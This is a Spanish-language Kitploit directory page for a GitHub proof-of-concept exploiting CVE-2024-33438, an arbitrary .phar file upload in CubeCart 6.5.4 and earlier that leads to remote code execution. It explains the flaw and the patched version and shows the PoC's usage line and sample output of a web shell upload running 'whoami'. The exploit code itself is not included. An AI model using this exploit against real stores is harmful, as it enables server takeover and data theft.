Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-33438 — CubeCart <= 6.5.4 es vulnerable a una carga de archivos arbitraria que conduce a una ejecución remota de código (RCE). | Kitploit
Herramientas/GitHubGitHub/julio-cfa/cve-2024-33438
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubjulio-cfa/cve-2024-33438

CVE-2024-33438

CubeCart <= 6.5.4 es vulnerable a una carga de archivos arbitraria que conduce a una ejecución remota de código (RCE).

Ver Repositorio
3hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Carga Arbitraria de Archivos Conduce a RCE (CVE-2024-33438)

CubeCart <= 6.5.4 es vulnerable a un problema de carga arbitraria de archivos que conduce a la ejecución remota de código (RCE). La vulnerabilidad afecta al administrador de archivos de la aplicación y sus filtros al permitir que los atacantes carguen archivos .phar que contienen código malicioso. CubeCart debe actualizarse a la versión 6.5.5, ya que implementa un parche de seguridad para corregir esta vulnerabilidad.

Para más detalles, consulte el anuncio oficial de CubeCart en las referencias.

Exploit

Se ha creado una prueba de concepto (PoC) automatizada, pero esta vulnerabilidad también se puede explotar manualmente subiendo un archivo .phar malicioso a través del administrador de archivos.

Este es el uso del PoC:

root@kitploit:~
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

Después de ejecutarlo, esta es la salida esperada para una explotación exitosa:

root@kitploit:~
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

Referencias

  • https://forums.cubecart.com/topic/59046-cubecart-655-released-minor-security-update/
  • https://github.com/cubecart/v6/issues/3570
  • https://github.com/cubecart/v6/commit/31a5ec39b0924b2111fbc3aa419bd8c5c3fc1841
  • https://www.cve.org/CVERecord?id=CVE-2024-33438
  • http://blog.cat22.io/blog/cve/cve-2024-33438.html
Descargar herramienta